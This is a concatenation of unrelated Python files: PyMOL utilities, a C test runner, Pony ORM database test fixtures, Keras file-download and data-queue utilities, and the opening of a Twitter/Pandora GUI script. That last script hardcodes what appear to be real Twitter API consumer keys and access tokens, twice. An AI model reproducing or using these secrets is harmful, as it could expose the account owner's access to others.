name = name.encode('ascii', errors='ignore')
mod = types.ModuleType(name)
mod.__file__ = file
mod.__script__ = file
sys.modules[name]=mod
if spawn:
t = threading.Thread(target=execfile,
args=(file,mod.__dict__,mod.__dict__))
t.setDaemon(1)
t.start()
else:
try:
execfile(file,mod.__dict__,mod.__dict__)
except pymol.CmdException:
_print_exc()
raise QuietException
del sys.modules[name]
del mod
def spawn_file(args,global_ns,local_ns):
local_ns['__script__'] = args
t = threading.Thread(target=execfile,args=(args,global_ns,local_ns))
t.setDaemon(1)
t.start()
def split(*arg,**kw): # custom split-and-trim
'''
split(string,token[,count]) -> list of strings
UTILITY FUNCTION, NOT PART OF THE API
Breaks strings up by tokens but preserves quoted strings and
parenthetical groups (such as atom selections).
USAGE OF THIS FUNCTION IS DISCOURAGED - THE GOAL IS TO
MAKE IT UNNECESSARY BY IMPROVING THE BUILT-IN PARSER
'''
str = arg[0]
tok = arg[1]
if len(arg)>2:
mx=arg[2]
else:
mx=0
pair = { '(':')','[':']','{':'}',"'":"'",'"':'"' }
plst = list(pair.keys())
stack = []
lst = []
c = 0
nf = 0
l = len(str)
wd = ""
while str[c]==tok:
c = c + 1
while c<l:
ch = str[c]
if (ch in tok) and (len(stack)==0):
lst.append(wd.strip())
nf = nf + 1
if mx:
if nf==mx:
wd = str[c+1:].strip()
break;
wd = ''
w = 0
else:
if len(stack):
if ch==stack[0]:
stack = stack[1:]
elif (ch in plst):
stack[:0]=[pair[ch]]
elif (ch in plst):
stack[:0]=[pair[ch]]
wd = wd + ch
c = c + 1
if len(wd):
lst.append(wd.strip())
return lst
import pymol
|
test.py
|
#!/usr/bin/python3
from pathlib import Path
import subprocess
import os
import string
import sys
import threading
SOURCE_DIR: str = './tests'
BUILD_DIR: str = "./build"
C_COMPILER: str = "gcc"
def task(filename: Path):
output_name = f"{Path(filename).stem}_test"
final_output_file = f"{BUILD_DIR}/{output_name}"
subprocess.run(args=[C_COMPILER, filename, "-g", "-o",
final_output_file])
subprocess.run(args=[final_output_file])
print(f"done testing {final_output_file}")
if __name__ == '__main__':
Path(f"{BUILD_DIR}").mkdir(parents=True, exist_ok=True)
tasks = []
for dirName, subdirList, fileList in os.walk(SOURCE_DIR):
for fname in list(filter(lambda x: x.endswith(".c"), fileList)):
test_c_file = f"{dirName}/{fname}"
print(f"compiling:{test_c_file}")
thread = threading.Thread(target=task, args=(test_c_file,))
thread.start()
tasks.append(thread)
for i, task in enumerate(tasks):
task.join()
|
fixtures.py
|
import sys
import os
import logging
from pony.py23compat import PY2
from ponytest import with_cli_args, pony_fixtures, provider_validators, provider, Fixture, \
ValidationError
from functools import wraps, partial
import click
from contextlib import contextmanager, closing
from pony.utils import cached_property, class_property
if not PY2:
from contextlib import contextmanager, ContextDecorator
else:
from contextlib2 import contextmanager, ContextDecorator
import unittest
from pony.orm import db_session, Database, rollback, delete
if not PY2:
from io import StringIO
else:
from StringIO import StringIO
from multiprocessing import Process
import threading
class DBContext(ContextDecorator):
fixture = 'db'
enabled = False
def __init__(self, Test):
if not isinstance(Test, type):
# FIXME ?
TestCls = type(Test)
NewClass = type(TestCls.__name__, (TestCls,), {})
NewClass.__module__ = TestCls.__module__
NewClass.db = property(lambda t: self.db)
Test.__class__ = NewClass
else:
Test.db = class_property(lambda cls: self.db)
self.Test = Test
@class_property
def fixture_name(cls):
return cls.db_provider
@class_property
def db_provider(cls):
# is used in tests
return cls.provider_key
def init_db(self):
raise NotImplementedError
@cached_property
def db(self):
raise NotImplementedError
def __enter__(self):
self.init_db()
try:
self.Test.make_entities()
except (AttributeError, TypeError):
# No method make_entities with due signature
pass
else:
self.db.generate_mapping(check_tables=True, create_tables=True)
return self.db
def __exit__(self, *exc_info):
self.db.provider.disconnect()
@classmethod
def validate_fixtures(cls, fixtures, config):
return any(f.fixture_key == 'db' for f in fixtures)
db_name = 'testdb'
@provider()
class GenerateMapping(ContextDecorator):
weight = 200
fixture = 'generate_mapping'
def __init__(self, Test):
self.Test = Test
def __enter__(self):
db = getattr(self.Test, 'db', None)
if not db or not db.entities:
return
for entity in db.entities.values():
if entity._database_.schema is None:
db.generate_mapping(check_tables=True, create_tables=True)
break
def __exit__(self, *exc_info):
pass
@provider()
class MySqlContext(DBContext):
provider_key = 'mysql'
def drop_db(self, cursor):
cursor.execute('use sys')
cursor.execute('drop database %s' % self.db_name)
def init_db(self):
from pony.orm.dbproviders.mysql import mysql_module
with closing(mysql_module.connect(**self.CONN).cursor()) as c:
try:
self.drop_db(c)
except mysql_module.DatabaseError as exc:
print('Failed to drop db: %s' % exc)
c.execute('create database %s' % self.db_name)
c.execute('use %s' % self.db_name)
CONN = {
'host': "localhost",
'user': "ponytest",
'passwd': "ponytest",
}
@cached_property
def db(self):
CONN = dict(self.CONN, db=self.db_name)
return Database('mysql', **CONN)
@provider()
class SqlServerContext(DBContext):
provider_key = 'sqlserver'
def get_conn_string(self, db=None):
s = (
'DSN=MSSQLdb;'
'SERVER=mssql;'
'UID=sa;'
'PWD=pass;'
)
if db:
s += 'DATABASE=%s' % db
return s
@cached_property
def db(self):
CONN = self.get_conn_string(self.db_name)
return Database('mssqlserver', CONN)
def init_db(self):
import pyodbc
cursor = pyodbc.connect(self.get_conn_string(), autocommit=True).cursor()
with closing(cursor) as c:
try:
self.drop_db(c)
except pyodbc.DatabaseError as exc:
print('Failed to drop db: %s' % exc)
c.execute('''CREATE DATABASE %s DEFAULT CHARACTER SET utf8 DEFAULT COLLATE utf8_general_ci''' % self.db_name )
c.execute('use %s' % self.db_name)
def drop_db(self, cursor):
cursor.execute('use master')
cursor.execute('drop database %s' % self.db_name)
class SqliteMixin(DBContext):
def init_db(self):
try:
os.remove(self.db_path)
except OSError as exc:
print('Failed to drop db: %s' % exc)
@cached_property
def db_path(self):
p = os.path.dirname(__file__)
p = os.path.join(p, '%s.sqlite' % self.db_name)
return os.path.abspath(p)
@cached_property
def db(self):
return Database('sqlite', self.db_path, create_db=True)
@provider()
class SqliteNoJson1(SqliteMixin):
provider_key = 'sqlite_no_json1'
enabled = True
def __init__(self, cls):
self.Test = cls
cls.no_json1 = True
return super(SqliteNoJson1, self).__init__(cls)
def __enter__(self):
resource = super(SqliteNoJson1, self).__enter__()
self.json1_available = self.Test.db.provider.json1_available
self.Test.db.provider.json1_available = False
return resource
def __exit__(self, *exc_info):
self.Test.db.provider.json1_available = self.json1_available
return super(SqliteNoJson1, self).__exit__(*exc_info)
@provider()
class SqliteJson1(SqliteMixin):
provider_key = 'sqlite_json1'
def __enter__(self):
result = super(SqliteJson1, self).__enter__()
if not self.db.provider.json1_available:
raise unittest.SkipTest
return result
@provider()
class PostgresContext(DBContext):
provider_key = 'postgresql'
def get_conn_dict(self, no_db=False):
d = dict(
user='ponytest', password='ponytest',
host='localhost', database='postgres',
)
if not no_db:
d.update(database=self.db_name)
return d
def init_db(self):
import psycopg2
conn = psycopg2.connect(
**self.get_conn_dict(no_db=True)
)
conn.set_isolation_level(0)
with closing(conn.cursor()) as cursor:
try:
self.drop_db(cursor)
except psycopg2.DatabaseError as exc:
print('Failed to drop db: %s' % exc)
cursor.execute('create database %s' % self.db_name)
def drop_db(self, cursor):
cursor.execute('drop database %s' % self.db_name)
@cached_property
def db(self):
return Database('postgres', **self.get_conn_dict())
@provider()
class OracleContext(DBContext):
provider_key = 'oracle'
def __enter__(self):
os.environ.update(dict(
ORACLE_BASE='/u01/app/oracle',
ORACLE_HOME='/u01/app/oracle/product/12.1.0/dbhome_1',
ORACLE_OWNR='oracle',
ORACLE_SID='orcl',
))
return super(OracleContext, self).__enter__()
def init_db(self):
import cx_Oracle
with closing(self.connect_sys()) as conn:
with closing(conn.cursor()) as cursor:
try:
self._destroy_test_user(cursor)
except cx_Oracle.DatabaseError as exc:
print('Failed to drop user: %s' % exc)
try:
self._drop_tablespace(cursor)
except cx_Oracle.DatabaseError as exc:
print('Failed to drop db: %s' % exc)
cursor.execute(
"""CREATE TABLESPACE %(tblspace)s
DATAFILE '%(datafile)s' SIZE 20M
REUSE AUTOEXTEND ON NEXT 10M MAXSIZE %(maxsize)s
""" % self.parameters)
cursor.execute(
"""CREATE TEMPORARY TABLESPACE %(tblspace_temp)s
TEMPFILE '%(datafile_tmp)s' SIZE 20M
REUSE AUTOEXTEND ON NEXT 10M MAXSIZE %(maxsize_tmp)s
""" % self.parameters)
self._create_test_user(cursor)
def _drop_tablespace(self, cursor):
cursor.execute(
'DROP TABLESPACE %(tblspace)s INCLUDING CONTENTS AND DATAFILES CASCADE CONSTRAINTS'
% self.parameters)
cursor.execute(
'DROP TABLESPACE %(tblspace_temp)s INCLUDING CONTENTS AND DATAFILES CASCADE CONSTRAINTS'
% self.parameters)
parameters = {
'tblspace': 'test_tblspace',
'tblspace_temp': 'test_tblspace_temp',
'datafile': 'test_datafile.dbf',
'datafile_tmp': 'test_datafile_tmp.dbf',
'user': 'ponytest',
'password': 'ponytest',
'maxsize': '100M',
'maxsize_tmp': '100M',
}
def connect_sys(self):
import cx_Oracle
return cx_Oracle.connect('sys/the@localhost/ORCL', mode=cx_Oracle.SYSDBA)
def connect_test(self):
import cx_Oracle
return cx_Oracle.connect('ponytest/ponytest@localhost/ORCL')
@cached_property
def db(self):
return Database('oracle', 'ponytest/ponytest@localhost/ORCL')
def _create_test_user(self, cursor):
cursor.execute(
"""CREATE USER %(user)s
IDENTIFIED BY %(password)s
DEFAULT TABLESPACE %(tblspace)s
TEMPORARY TABLESPACE %(tblspace_temp)s
QUOTA UNLIMITED ON %(tblspace)s
""" % self.parameters
)
cursor.execute(
"""GRANT CREATE SESSION,
CREATE TABLE,
CREATE SEQUENCE,
CREATE PROCEDURE,
CREATE TRIGGER
TO %(user)s
""" % self.parameters
)
def _destroy_test_user(self, cursor):
cursor.execute('''
DROP USER %(user)s CASCADE
''' % self.parameters)
@provider(fixture='log', weight=100, enabled=False)
@contextmanager
def logging_context(test):
level = logging.getLogger().level
from pony.orm.core import debug, sql_debug
logging.getLogger().setLevel(logging.INFO)
sql_debug(True)
yield
logging.getLogger().setLevel(level)
sql_debug(debug)
@provider(fixture='log_all', weight=-100, enabled=False)
def log_all(Test):
return logging_context(Test)
# @with_cli_args
# @click.option('--log', 'scope', flag_value='test')
# @click.option('--log-all', 'scope', flag_value='all')
# def use_logging(scope):
# if scope == 'test':
# yield logging_context
# elif scope =='all':
# yield log_all
# @provider(enabled=False)
# class DBSessionProvider(object):
#
# fixture= 'db_session'
#
# weight = 30
#
# def __new__(cls, test):
# return db_session
@provider(fixture='rollback', weight=40)
@contextmanager
def do_rollback(test):
try:
yield
finally:
rollback()
@provider()
class SeparateProcess(object):
# TODO read failures from sep process better
fixture = 'separate_process'
enabled = False
def __init__(self, Test):
self.Test = Test
def __call__(self, func):
def wrapper(Test):
rnr = unittest.runner.TextTestRunner()
TestCls = Test if isinstance(Test, type) else type(Test)
def runTest(self):
try:
func(Test)
finally:
rnr.stream = unittest.runner._WritelnDecorator(StringIO())
name = getattr(func, '__name__', 'runTest')
Case = type(TestCls.__name__, (TestCls,), {name: runTest})
Case.__module__ = TestCls.__module__
case = Case(name)
suite = unittest.suite.TestSuite([case])
def run():
result = rnr.run(suite)
if not result.wasSuccessful():
sys.exit(1)
p = Process(target=run, args=())
p.start()
p.join()
case.assertEqual(p.exitcode, 0)
return wrapper
@classmethod
def validate_chain(cls, fixtures, klass):
for f in fixtures:
if f.KEY in ('ipdb', 'ipdb_all'):
return False
for f in fixtures:
if f.KEY == 'db' and f.provider_key in ('sqlserver', 'oracle'):
return True
@provider()
class ClearTables(ContextDecorator):
fixture = 'clear_tables'
def __init__(self, test):
self.test = test
def __enter__(self):
pass
@db_session
def __exit__(self, *exc_info):
db = self.test.db
for entity in db.entities.values():
if entity._database_.schema is None:
break
delete(i for i in entity)
import signal
@provider()
class Timeout(object):
fixture = 'timeout'
@with_cli_args
@click.option('--timeout', type=int)
def __init__(self, Test, timeout):
self.Test = Test
self.timeout = timeout if timeout else Test.TIMEOUT
enabled = False
class Exception(Exception):
pass
class FailedInSubprocess(Exception):
pass
def __call__(self, func):
def wrapper(test):
p = Process(target=func, args=(test,))
p.start()
def on_expired():
p.terminate()
t = threading.Timer(self.timeout, on_expired)
t.start()
p.join()
t.cancel()
if p.exitcode == -signal.SIGTERM:
raise self.Exception
elif p.exitcode:
raise self.FailedInSubprocess
return wrapper
@classmethod
@with_cli_args
@click.option('--timeout', type=int)
def validate_chain(cls, fixtures, klass, timeout):
if not getattr(klass, 'TIMEOUT', None) and not timeout:
return False
for f in fixtures:
if f.KEY in ('ipdb', 'ipdb_all'):
return False
for f in fixtures:
if f.KEY == 'db' and f.provider_key in ('sqlserver', 'oracle'):
return True
pony_fixtures['test'].extend([
'log',
'clear_tables',
])
pony_fixtures['class'].extend([
'separate_process',
'timeout',
'db',
'log_all',
'generate_mapping',
])
|
data_utils.py
|
"""Utilities for file download and caching."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import hashlib
import multiprocessing as mp
import os
import random
import shutil
import sys
import tarfile
import threading
import time
import warnings
import zipfile
from abc import abstractmethod
from contextlib import closing
from multiprocessing.pool import ThreadPool
import numpy as np
import six
from six.moves.urllib.error import HTTPError
from six.moves.urllib.error import URLError
from six.moves.urllib.request import urlopen
try:
import queue
except ImportError:
import Queue as queue
from ..utils.generic_utils import Progbar
if sys.version_info[0] == 2:
def urlretrieve(url, filename, reporthook=None, data=None):
"""Replacement for `urlretrive` for Python 2.
Under Python 2, `urlretrieve` relies on `FancyURLopener` from legacy
`urllib` module, known to have issues with proxy management.
# Arguments
url: url to retrieve.
filename: where to store the retrieved data locally.
reporthook: a hook function that will be called once
on establishment of the network connection and once
after each block read thereafter.
The hook will be passed three arguments;
a count of blocks transferred so far,
a block size in bytes, and the total size of the file.
data: `data` argument passed to `urlopen`.
"""
def chunk_read(response, chunk_size=8192, reporthook=None):
content_type = response.info().get('Content-Length')
total_size = -1
if content_type is not None:
total_size = int(content_type.strip())
count = 0
while True:
chunk = response.read(chunk_size)
count += 1
if reporthook is not None:
reporthook(count, chunk_size, total_size)
if chunk:
yield chunk
else:
break
with closing(urlopen(url, data)) as response, open(filename, 'wb') as fd:
for chunk in chunk_read(response, reporthook=reporthook):
fd.write(chunk)
else:
from six.moves.urllib.request import urlretrieve
def _extract_archive(file_path, path='.', archive_format='auto'):
"""Extracts an archive if it matches tar, tar.gz, tar.bz, or zip formats.
# Arguments
file_path: path to the archive file
path: path to extract the archive file
archive_format: Archive format to try for extracting the file.
Options are 'auto', 'tar', 'zip', and None.
'tar' includes tar, tar.gz, and tar.bz files.
The default 'auto' is ['tar', 'zip'].
None or an empty list will return no matches found.
# Returns
True if a match was found and an archive extraction was completed,
False otherwise.
"""
if archive_format is None:
return False
if archive_format == 'auto':
archive_format = ['tar', 'zip']
if isinstance(archive_format, six.string_types):
archive_format = [archive_format]
for archive_type in archive_format:
if archive_type == 'tar':
open_fn = tarfile.open
is_match_fn = tarfile.is_tarfile
if archive_type == 'zip':
open_fn = zipfile.ZipFile
is_match_fn = zipfile.is_zipfile
if is_match_fn(file_path):
with open_fn(file_path) as archive:
try:
archive.extractall(path)
except (tarfile.TarError, RuntimeError,
KeyboardInterrupt):
if os.path.exists(path):
if os.path.isfile(path):
os.remove(path)
else:
shutil.rmtree(path)
raise
return True
return False
def get_file(fname,
origin,
untar=False,
md5_hash=None,
file_hash=None,
cache_subdir='datasets',
hash_algorithm='auto',
extract=False,
archive_format='auto',
cache_dir=None):
"""Downloads a file from a URL if it not already in the cache.
By default the file at the url `origin` is downloaded to the
cache_dir `~/.keras`, placed in the cache_subdir `datasets`,
and given the filename `fname`. The final location of a file
`example.txt` would therefore be `~/.keras/datasets/example.txt`.
Files in tar, tar.gz, tar.bz, and zip formats can also be extracted.
Passing a hash will verify the file after download. The command line
programs `shasum` and `sha256sum` can compute the hash.
# Arguments
fname: Name of the file. If an absolute path `/path/to/file.txt` is
specified the file will be saved at that location.
origin: Original URL of the file.
untar: Deprecated in favor of 'extract'.
boolean, whether the file should be decompressed
md5_hash: Deprecated in favor of 'file_hash'.
md5 hash of the file for verification
file_hash: The expected hash string of the file after download.
The sha256 and md5 hash algorithms are both supported.
cache_subdir: Subdirectory under the Keras cache dir where the file is
saved. If an absolute path `/path/to/folder` is
specified the file will be saved at that location.
hash_algorithm: Select the hash algorithm to verify the file.
options are 'md5', 'sha256', and 'auto'.
The default 'auto' detects the hash algorithm in use.
extract: True tries extracting the file as an Archive, like tar or zip.
archive_format: Archive format to try for extracting the file.
Options are 'auto', 'tar', 'zip', and None.
'tar' includes tar, tar.gz, and tar.bz files.
The default 'auto' is ['tar', 'zip'].
None or an empty list will return no matches found.
cache_dir: Location to store cached files, when None it
defaults to the [Keras Directory](/faq/#where-is-the-keras-configuration-filed-stored).
# Returns
Path to the downloaded file
""" # noqa
if cache_dir is None:
cache_dir = os.path.join(os.path.expanduser('~'), '.keras')
if md5_hash is not None and file_hash is None:
file_hash = md5_hash
hash_algorithm = 'md5'
datadir_base = os.path.expanduser(cache_dir)
if not os.access(datadir_base, os.W_OK):
datadir_base = os.path.join('/tmp', '.keras')
datadir = os.path.join(datadir_base, cache_subdir)
if not os.path.exists(datadir):
os.makedirs(datadir)
if untar:
untar_fpath = os.path.join(datadir, fname)
fpath = untar_fpath + '.tar.gz'
else:
fpath = os.path.join(datadir, fname)
download = False
if os.path.exists(fpath):
# File found; verify integrity if a hash was provided.
if file_hash is not None:
if not validate_file(fpath, file_hash, algorithm=hash_algorithm):
print('A local file was found, but it seems to be '
'incomplete or outdated because the ' + hash_algorithm +
' file hash does not match the original value of ' +
file_hash + ' so we will re-download the data.')
download = True
else:
download = True
if download:
print('Downloading data from', origin)
class ProgressTracker(object):
# Maintain progbar for the lifetime of download.
# This design was chosen for Python 2.7 compatibility.
progbar = None
def dl_progress(count, block_size, total_size):
if ProgressTracker.progbar is None:
if total_size == -1:
total_size = None
ProgressTracker.progbar = Progbar(total_size)
else:
ProgressTracker.progbar.update(count * block_size)
error_msg = 'URL fetch failure on {} : {} -- {}'
try:
try:
urlretrieve(origin, fpath, dl_progress)
except HTTPError as e:
raise Exception(error_msg.format(origin, e.code, e.msg))
except URLError as e:
raise Exception(error_msg.format(origin, e.errno, e.reason))
except (Exception, KeyboardInterrupt):
if os.path.exists(fpath):
os.remove(fpath)
raise
ProgressTracker.progbar = None
if untar:
if not os.path.exists(untar_fpath):
_extract_archive(fpath, datadir, archive_format='tar')
return untar_fpath
if extract:
_extract_archive(fpath, datadir, archive_format)
return fpath
def _hash_file(fpath, algorithm='sha256', chunk_size=65535):
"""Calculates a file sha256 or md5 hash.
# Example
```python
>>> from keras.data_utils import _hash_file
>>> _hash_file('/path/to/file.zip')
'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'
```
# Arguments
fpath: path to the file being validated
algorithm: hash algorithm, one of 'auto', 'sha256', or 'md5'.
The default 'auto' detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
# Returns
The file hash
"""
if (algorithm == 'sha256') or (algorithm == 'auto' and len(hash) == 64):
hasher = hashlib.sha256()
else:
hasher = hashlib.md5()
with open(fpath, 'rb') as fpath_file:
for chunk in iter(lambda: fpath_file.read(chunk_size), b''):
hasher.update(chunk)
return hasher.hexdigest()
def validate_file(fpath, file_hash, algorithm='auto', chunk_size=65535):
"""Validates a file against a sha256 or md5 hash.
# Arguments
fpath: path to the file being validated
file_hash: The expected hash string of the file.
The sha256 and md5 hash algorithms are both supported.
algorithm: Hash algorithm, one of 'auto', 'sha256', or 'md5'.
The default 'auto' detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
# Returns
Whether the file is valid
"""
if ((algorithm == 'sha256') or
(algorithm == 'auto' and len(file_hash) == 64)):
hasher = 'sha256'
else:
hasher = 'md5'
if str(_hash_file(fpath, hasher, chunk_size)) == str(file_hash):
return True
else:
return False
class Sequence(object):
"""Base object for fitting to a sequence of data, such as a dataset.
Every `Sequence` must implement the `__getitem__` and the `__len__` methods.
If you want to modify your dataset between epochs you may implement
`on_epoch_end`. The method `__getitem__` should return a complete batch.
# Notes
`Sequence` are a safer way to do multiprocessing. This structure guarantees
that the network will only train once on each sample per epoch which is not
the case with generators.
# Examples
```python
from skimage.io import imread
from skimage.transform import resize
import numpy as np
# Here, `x_set` is list of path to the images
# and `y_set` are the associated classes.
class CIFAR10Sequence(Sequence):
def __init__(self, x_set, y_set, batch_size):
self.x, self.y = x_set, y_set
self.batch_size = batch_size
def __len__(self):
return int(np.ceil(len(self.x) / float(self.batch_size)))
def __getitem__(self, idx):
batch_x = self.x[idx * self.batch_size:(idx + 1) * self.batch_size]
batch_y = self.y[idx * self.batch_size:(idx + 1) * self.batch_size]
return np.array([
resize(imread(file_name), (200, 200))
for file_name in batch_x]), np.array(batch_y)
```
"""
use_sequence_api = True
@abstractmethod
def __getitem__(self, index):
"""Gets batch at position `index`.
# Arguments
index: position of the batch in the Sequence.
# Returns
A batch
"""
raise NotImplementedError
@abstractmethod
def __len__(self):
"""Number of batch in the Sequence.
# Returns
The number of batches in the Sequence.
"""
raise NotImplementedError
def on_epoch_end(self):
"""Method called at the end of every epoch.
"""
pass
def __iter__(self):
"""Create a generator that iterate over the Sequence."""
for item in (self[i] for i in range(len(self))):
yield item
# Global variables to be shared across processes
_SHARED_SEQUENCES = {}
# We use a Value to provide unique id to different processes.
_SEQUENCE_COUNTER = None
def init_pool(seqs):
global _SHARED_SEQUENCES
_SHARED_SEQUENCES = seqs
def get_index(uid, i):
"""Get the value from the Sequence `uid` at index `i`.
To allow multiple Sequences to be used at the same time, we use `uid` to
get a specific one. A single Sequence would cause the validation to
overwrite the training Sequence.
# Arguments
uid: int, Sequence identifier
i: index
# Returns
The value at index `i`.
"""
return _SHARED_SEQUENCES[uid][i]
class SequenceEnqueuer(object):
"""Base class to enqueue inputs.
The task of an Enqueuer is to use parallelism to speed up preprocessing.
This is done with processes or threads.
# Examples
```python
enqueuer = SequenceEnqueuer(...)
enqueuer.start()
datas = enqueuer.get()
for data in datas:
# Use the inputs; training, evaluating, predicting.
# ... stop sometime.
enqueuer.close()
```
The `enqueuer.get()` should be an infinite stream of datas.
"""
def __init__(self, sequence,
use_multiprocessing=False):
self.sequence = sequence
self.use_multiprocessing = use_multiprocessing
global _SEQUENCE_COUNTER
if _SEQUENCE_COUNTER is None:
try:
_SEQUENCE_COUNTER = mp.Value('i', 0)
except OSError:
# In this case the OS does not allow us to use
# multiprocessing. We resort to an int
# for enqueuer indexing.
_SEQUENCE_COUNTER = 0
if isinstance(_SEQUENCE_COUNTER, int):
self.uid = _SEQUENCE_COUNTER
_SEQUENCE_COUNTER += 1
else:
# Doing Multiprocessing.Value += x is not process-safe.
with _SEQUENCE_COUNTER.get_lock():
self.uid = _SEQUENCE_COUNTER.value
_SEQUENCE_COUNTER.value += 1
self.workers = 0
self.executor_fn = None
self.queue = None
self.run_thread = None
self.stop_signal = None
def is_running(self):
return self.stop_signal is not None and not self.stop_signal.is_set()
def start(self, workers=1, max_queue_size=10):
"""Start the handler's workers.
# Arguments
workers: number of worker threads
max_queue_size: queue size
(when full, workers could block on `put()`)
"""
if self.use_multiprocessing:
self.executor_fn = self._get_executor_init(workers)
else:
# We do not need the init since it's threads.
self.executor_fn = lambda _: ThreadPool(workers)
self.workers = workers
self.queue = queue.Queue(max_queue_size)
self.stop_signal = threading.Event()
self.run_thread = threading.Thread(target=self._run)
self.run_thread.daemon = True
self.run_thread.start()
def _send_sequence(self):
"""Send current Iterable to all workers."""
# For new processes that may spawn
_SHARED_SEQUENCES[self.uid] = self.sequence
def stop(self, timeout=None):
"""Stops running threads and wait for them to exit, if necessary.
Should be called by the same thread which called `start()`.
# Arguments
timeout: maximum time to wait on `thread.join()`
"""
self.stop_signal.set()
with self.queue.mutex:
self.queue.queue.clear()
self.queue.unfinished_tasks = 0
self.queue.not_full.notify()
self.run_thread.join(timeout)
_SHARED_SEQUENCES[self.uid] = None
@abstractmethod
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
raise NotImplementedError
@abstractmethod
def _get_executor_init(self, workers):
"""Get the Pool initializer for multiprocessing.
# Returns
Function, a Function to initialize the pool
"""
raise NotImplementedError
@abstractmethod
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Returns
Generator yielding tuples `(inputs, targets)`
or `(inputs, targets, sample_weights)`.
"""
raise NotImplementedError
class OrderedEnqueuer(SequenceEnqueuer):
"""Builds a Enqueuer from a Sequence.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
sequence: A `keras.utils.data_utils.Sequence` object.
use_multiprocessing: use multiprocessing if True, otherwise threading
shuffle: whether to shuffle the data at the beginning of each epoch
"""
def __init__(self, sequence, use_multiprocessing=False, shuffle=False):
super(OrderedEnqueuer, self).__init__(sequence, use_multiprocessing)
self.shuffle = shuffle
def _get_executor_init(self, workers):
"""Get the Pool initializer for multiprocessing.
# Returns
Function, a Function to initialize the pool
"""
return lambda seqs: mp.Pool(workers,
initializer=init_pool,
initargs=(seqs,))
def _wait_queue(self):
"""Wait for the queue to be empty."""
while True:
time.sleep(0.1)
if self.queue.unfinished_tasks == 0 or self.stop_signal.is_set():
return
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
sequence = list(range(len(self.sequence)))
self._send_sequence() # Share the initial sequence
while True:
if self.shuffle:
random.shuffle(sequence)
with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:
for i in sequence:
if self.stop_signal.is_set():
return
self.queue.put(
executor.apply_async(get_index, (self.uid, i)), block=True)
# Done with the current epoch, waiting for the final batches
self._wait_queue()
if self.stop_signal.is_set():
# We're done
return
# Call the internal on epoch end.
self.sequence.on_epoch_end()
self._send_sequence() # Update the pool
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Yields
The next element in the queue, i.e. a tuple
`(inputs, targets)` or
`(inputs, targets, sample_weights)`.
"""
try:
while self.is_running():
inputs = self.queue.get(block=True).get()
self.queue.task_done()
if inputs is not None:
yield inputs
except Exception:
self.stop()
six.reraise(*sys.exc_info())
def init_pool_generator(gens, random_seed=None):
global _SHARED_SEQUENCES
_SHARED_SEQUENCES = gens
if random_seed is not None:
ident = mp.current_process().ident
np.random.seed(random_seed + ident)
def next_sample(uid):
"""Get the next value from the generator `uid`.
To allow multiple generators to be used at the same time, we use `uid` to
get a specific one. A single generator would cause the validation to
overwrite the training generator.
# Arguments
uid: int, generator identifier
# Returns
The next value of generator `uid`.
"""
return six.next(_SHARED_SEQUENCES[uid])
class GeneratorEnqueuer(SequenceEnqueuer):
"""Builds a queue out of a data generator.
The provided generator can be finite in which case the class will throw
a `StopIteration` exception.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
generator: a generator function which yields data
use_multiprocessing: use multiprocessing if True, otherwise threading
wait_time: time to sleep in-between calls to `put()`
random_seed: Initial seed for workers,
will be incremented by one for each worker.
"""
def __init__(self, sequence, use_multiprocessing=False, wait_time=None,
random_seed=None):
super(GeneratorEnqueuer, self).__init__(sequence, use_multiprocessing)
self.random_seed = random_seed
if wait_time is not None:
warnings.warn('`wait_time` is not used anymore.',
DeprecationWarning)
def _get_executor_init(self, workers):
"""Get the Pool initializer for multiprocessing.
# Returns
Function, a Function to initialize the pool
"""
return lambda seqs: mp.Pool(workers,
initializer=init_pool_generator,
initargs=(seqs, self.random_seed))
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
self._send_sequence() # Share the initial generator
with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:
while True:
if self.stop_signal.is_set():
return
self.queue.put(
executor.apply_async(next_sample, (self.uid,)), block=True)
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Yields
The next element in the queue, i.e. a tuple
`(inputs, targets)` or
`(inputs, targets, sample_weights)`.
"""
try:
while self.is_running():
inputs = self.queue.get(block=True).get()
self.queue.task_done()
if inputs is not None:
yield inputs
except StopIteration:
# Special case for finite generators
last_ones = []
while self.queue.qsize() > 0:
last_ones.append(self.queue.get(block=True))
# Wait for them to complete
list(map(lambda f: f.wait(), last_ones))
# Keep the good ones
last_ones = [future.get() for future in last_ones if future.successful()]
for inputs in last_ones:
if inputs is not None:
yield inputs
except Exception as e:
self.stop()
if 'generator already executing' in str(e):
raise RuntimeError(
"Your generator is NOT thread-safe."
"Keras requires a thread-safe generator when"
"`use_multiprocessing=False, workers > 1`."
"For more information see issue #1638.")
six.reraise(*sys.exc_info())
|
twitter+gui_backup_oct12.py
|
#Titter + gui
from Tkinter import *
from time import sleep
import os
import tweepy
import requests
import json
from pydora import player
from pandora import clientbuilder
import sys
import termios
import getpass
import subprocess
import time
#import for gui
import Tkinter
#import for processes using rabbitmq
import pika
from multiprocessing import Process, Manager
#Global Variable keys (I got these from the twitter app page)
#need to change them for other twitter accounts
'''
consumer_key = "3gI3AIYm8OkxfkU9Er81DZ4Kd"
consumer_secret = "drCThGHlqjHfF3QcFiEWBEnter Text Here1LjvsglEiHoiKQ5OeB1UiYCx7PyMl"
access_token = "2462366071-WHcsSVijoOa9tHWokK8ZNd1zQRJSseJPojGQGut"
access_token_secret = "gtbePKnCgIl6UpkrUGLks3o77WYgKoWeRnVKXOLIg2kQ4"
'''
consumer_key = "3gI3AIYm8OkxfkU9Er81DZ4Kd"
consumer_secret = "drCThGHlqjHfF3QcFiEWB1LjvsglEiHoiKQ5OeB1UiYCx7PyMl"
access_token = "2462366071-WHcsSVijoOa9tHWokK8ZNd1zQRJSseJPojGQGut"
access_token_secret = "gtbePKnCgIl6UpkrUGLks3o77WYgKoWeRnVKXOLIg2kQ4"
